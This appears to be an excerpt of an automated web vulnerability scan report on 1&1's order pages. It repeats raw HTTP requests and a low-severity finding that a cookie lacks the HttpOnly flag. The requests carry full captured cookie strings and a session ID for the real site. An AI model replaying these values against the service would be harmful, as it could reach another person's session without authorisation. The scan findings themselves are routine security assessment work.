GET /xml/order/FeatureServerDedOsWindowsOpt HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2a662dae85f36400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerFirewall HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3615648872672000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerHarddrive HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2f065831d35d1400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerMonitoring HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=4d33fa49f0c72000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerMonitoringCloud HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=52d42869220c5000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerProcessor HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2ee9ff185893a000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerRecovery HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=2c6856928977d800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerSsl HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3f8e9c0500a60000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerVpsOsLinux HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=517ca537a4bc3c00; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureServerVpsOsWindows HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=23f729c028981800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingAsp HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingBlog;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=243737f9e62df400; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingBlog HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=27a6c0dfbabd7800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingCgi HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingCgi;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=e60106dc2a1f800; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingCnba HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingCnba;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top&__lf=Static HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
__PFIX_TST_=3451d6a5fb8ed000; Path=/
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingContentmoduls HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /xml/order/FeatureSite-buildingContentmoduls;jsessionid=CC07C007652F99CC9FB631C4D3D45323.TCpfix141a?__frame=_top HTTP/1.1 Host: order.1and1.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: UT=BZFkpLC06Y2NjXXBmbTNrZTIkLmdaVCxDNjAYHDAwLy0vLSoqLSwmKS0gIiEgHUIwXFFTeDAyLV02YG81KCklJCklIyYkHiYdHCV0dTswN2dwNikqJiUqJyUlJCIgIiU=; __PFIX_TST_=635c29cd52a24c00; emos1und1d1_jcvid=AAABLtO_k24TPu6u_AC8X2ba*4tdkREw:2:AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:1300642308873:0:false:10; backpage=addon; variant.configname=2010-04-14; ucuo=20110320185042-000.TCpfix141a; lastpage=domaincheck; ac-whom-us=OM.US.USa02K18619H7072a; __PFIX_SSC_26b8ec94fefdfb08ca83db66c3c9d4cf=1300643896110_1d32f37376d4f800; variant=QUM6ZGVmYXVsdA==; emos1und1d1_jcsid=AAABLtRSowmWoXKUuK13TmPt9oC0YgfD:41:AAABLtRrQfzB2YvHnChMDPnBS4VYP5WZ:1300643922428; __PFIX_SSC_7e7cde34cee1122e923172c6a51093f7=1300643995381_102591b64f59ec00; __PFIX_SSC_f2c438924f4c8ffc632c427e36641871=1300643999165_6735f29c6c45e400;
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"> <html lang="en-US"><head> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"> <ti ...[SNIP]...
The following cookie was issued by the application and does not have the HttpOnly flag set:
